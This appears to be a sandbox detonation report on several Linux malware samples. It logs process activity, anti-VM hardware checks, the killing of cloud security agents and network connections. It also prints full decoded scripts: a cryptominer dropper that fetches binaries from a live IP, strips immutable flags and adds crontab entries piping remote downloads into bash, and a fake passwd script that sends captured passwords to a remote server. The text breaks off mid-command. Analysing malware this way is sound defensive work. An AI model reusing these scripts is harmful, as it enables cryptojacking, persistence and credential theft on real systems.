File opened for reading /proc/377/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/694/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/717/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/693/cmdline /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/693/stat /usr/bin/killall N/A
File opened for reading /proc/694/cmdline /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/694/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/106/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/666/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

139s

Command Line

[/tmp/xrx/xrx]

Signatures

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/bios_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/sys_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_vendor /tmp/xrx/xrx N/A

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/xrx/xrx N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/xrx/xrx N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/types /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xrx/xrx N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/node/online /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xrx/xrx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/mounts /tmp/xrx/xrx N/A
File opened for reading /proc/self/cpuset /tmp/xrx/xrx N/A
File opened for reading /proc/meminfo /tmp/xrx/xrx N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xrx/xrx N/A

Processes

/tmp/xrx/xrx

[/tmp/xrx/xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CH 179.43.154.189:2008 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.3:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240611-en

Max time kernel

4s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240418-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/236/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/732/cmdline /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/69/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/332/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/760/stat /usr/bin/killall N/A
File opened for reading /proc/726/cmdline /usr/bin/killall N/A
File opened for reading /proc/769/stat /usr/bin/killall N/A
File opened for reading /proc/364/stat /usr/bin/killall N/A
File opened for reading /proc/332/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/420/stat /usr/bin/killall N/A
File opened for reading /proc/758/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/726/cmdline /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/362/stat /usr/bin/killall N/A
File opened for reading /proc/750/stat /usr/bin/killall N/A
File opened for reading /proc/236/stat /usr/bin/killall N/A
File opened for reading /proc/758/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/175/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/391/stat /usr/bin/killall N/A
File opened for reading /proc/127/cmdline /usr/bin/killall N/A
File opened for reading /proc/726/stat /usr/bin/killall N/A
File opened for reading /proc/751/stat /usr/bin/killall N/A
File opened for reading /proc/760/stat /usr/bin/killall N/A
File opened for reading /proc/364/stat /usr/bin/killall N/A
File opened for reading /proc/727/cmdline /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/255/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/69/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/752/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240418-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

14s

Max time network

132s

Command Line

[/tmp/xrx/secure]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/50/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/791/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1052/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/48/stat /usr/bin/pgrep N/A
File opened for reading /proc/436/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/5/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/508/stat /usr/bin/pgrep N/A
File opened for reading /proc/2558/ctty /usr/bin/pgrep N/A
File opened for reading /proc/22/status /usr/bin/pgrep N/A
File opened for reading /proc/23/stat /usr/bin/pgrep N/A
File opened for reading /proc/54/stat /usr/bin/pgrep N/A
File opened for reading /proc/2245/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2316/stat /usr/bin/pgrep N/A
File opened for reading /proc/10/status /usr/bin/pgrep N/A
File opened for reading /proc/20/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/28/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2346/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/56/status /usr/bin/pgrep N/A
File opened for reading /proc/274/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/80/stat /usr/bin/pgrep N/A
File opened for reading /proc/1079/stat /usr/bin/pgrep N/A
File opened for reading /proc/2007/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2220/status /usr/bin/pgrep N/A
File opened for reading /proc/2314/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/771/status /usr/bin/pgrep N/A
File opened for reading /proc/417/stat /usr/bin/pgrep N/A
File opened for reading /proc/585/status /usr/bin/pgrep N/A
File opened for reading /proc/2477/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/152/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1776/stat /usr/bin/pgrep N/A
File opened for reading /proc/24/stat /usr/bin/pgrep N/A
File opened for reading /proc/42/ctty /usr/bin/pgrep N/A
File opened for reading /proc/184/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/185/status /usr/bin/pgrep N/A
File opened for reading /proc/2/status /usr/bin/pgrep N/A
File opened for reading /proc/35/ctty /usr/bin/pgrep N/A
File opened for reading /proc/53/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/13/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/372/status /usr/bin/pgrep N/A
File opened for reading /proc/2479/status /usr/bin/pgrep N/A
File opened for reading /proc/2249/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2307/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2607/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/55/status /usr/bin/pgrep N/A
File opened for reading /proc/456/stat /usr/bin/pgrep N/A
File opened for reading /proc/187/status /usr/bin/pgrep N/A
File opened for reading /proc/1129/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2295/ctty /usr/bin/pgrep N/A
File opened for reading /proc/183/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/417/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/580/stat /usr/bin/pgrep N/A
File opened for reading /proc/1057/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/36/status /usr/bin/pgrep N/A
File opened for reading /proc/791/status /usr/bin/pgrep N/A
File opened for reading /proc/26/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/392/stat /usr/bin/pgrep N/A
File opened for reading /proc/816/status /usr/bin/pgrep N/A
File opened for reading /proc/2249/ctty /usr/bin/pgrep N/A
File opened for reading /proc/31/ctty /usr/bin/pgrep N/A
File opened for reading /proc/64/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/771/stat /usr/bin/pgrep N/A
File opened for reading /proc/2551/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2827/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2830/status /usr/bin/pgrep N/A

Processes

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c exec '/tmp/xrx/secure' "$@" /tmp/xrx/secure]

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/xrx/secure]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/grep

[grep -q secure]

/usr/bin/cat

[cat /etc/crontab]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/sleep

[sleep 1]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
GB 185.125.190.82:80 security.ubuntu.com tcp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

Signatures

N/A

Processes

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' "$@" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c #!/bin/bash if [ "$1" = "pollo" ]; then echo 'pollo 👍' exit fi username=$(whoami) if [ "$username" = "root" ]; then if [ "$#" -ne "0" ]; then echo 'Changing password for user '$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar0 $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s 